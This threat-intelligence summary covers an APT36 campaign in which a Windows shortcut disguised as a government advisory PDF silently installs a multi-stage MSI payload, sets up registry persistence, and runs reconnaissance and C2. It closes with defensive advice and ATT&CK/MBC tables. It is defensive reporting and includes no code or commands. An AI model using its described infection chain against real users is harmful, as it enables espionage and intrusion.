EXECUTIVE SUMMARY:
A malware campaign attributed to the APT36 threat actor, a group widely associated with cyber-espionage operations against government, defense, and strategic organizations. The campaign relies heavily on social engineering, using a file that appears to be a legitimate government advisory PDF but is actually a malicious Windows shortcut (.lnk). Due to default Windows settings that hide file extensions, the shortcut masquerades convincingly as a benign document, increasing the likelihood of user interaction. Once executed, the shortcut initiates a concealed infection chain designed to deploy additional malicious components while maintaining a low user-visible footprint. The primary objective of the operation is to gain persistent access to victim systems, enabling long-term surveillance and remote control. This campaign demonstrates how attackers blend psychological manipulation with technical precision, exploiting user trust and native operating system features to bypass initial suspicion. The approach reflects a mature threat model focused on stealth, persistence, and continued access rather than immediate disruption.
When the malicious .lnk file is opened, it executes an obfuscated command that invokes msiexec.exe to download and silently install an MSI payload from attacker-controlled infrastructure. The MSI package delivers a multi-stage malware framework, including a .NET-based loader and supporting executables designed to extend functionality and evade detection. To distract the victim, a decoy PDF document is dropped and opened, masking the background installation process. The malware establishes persistence by deploying files such as a malicious DLL and registering execution mechanisms through registry modifications using HTA and VBScript components. These techniques ensure the malware survives system reboots and maintains execution capability. Additionally, the malware conducts host reconnaissance, gathering information about the system environment, security tools, and virtualization artifacts. Command-and-control functionality allows the attacker to execute remote commands and adapt operations dynamically, highlighting a flexible and resilient infection chain engineered for sustained access.
This campaign illustrates a highly effective blend of deception, living-off-the-land techniques, and persistence mechanisms commonly associated with advanced threat actors. By abusing trusted system utilities and disguising malicious content as legitimate documentation, the attackers significantly reduce the chances of early detection. Even in cases where command-and-control infrastructure becomes temporarily unavailable, the persistence mechanisms ensure that infected systems remain compromised and capable of reconnecting when infrastructure is restored. The operation highlights the ongoing risk posed by shortcut-based malware delivery and the abuse of installer frameworks like MSI for stealthy payload execution. Defenders should prioritize restricting untrusted shortcut execution, monitoring MSI-based installations, enforcing file-extension visibility, and strengthening endpoint behavioral detection. User awareness combined with intelligence-driven monitoring is critical to mitigating similar threats, as such campaigns continue to evolve in sophistication and operational discipline.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| T1059.001 | Command and Scripting Interpreter | PowerShell | |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Privilege Escalation | T1548 | Abuse Elevation Control Mechanism | - |
| Defense Evasion | T1027 | Obfuscated Files or Information | - |
| Discovery | T1082 | System Information Discovery | - |
| T1518.001 | Software Discovery | Security Software Discovery | |
| Collection | T1119 | Automated Collection | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1105 | Ingress Tool Transfer | - | |
| T1573.001 | Encrypted Channel | Symmetric Cryptography |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| Execution | E1204 | User Execution |
| Anti-Static Analysis | E1027 | Obfuscated Files or Information |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Command and Control | B0030 | C2 Communication |
| Discovery | B0013 | Analysis Tool Discovery |
| Anti-Behavioral Analysis | B0009 | Virtual Machine Detection |
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/apt-36-uses-fake-whatsapp-fraud-advisory-to-hack-government-systems/
https://www.cyfirma.com/research/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/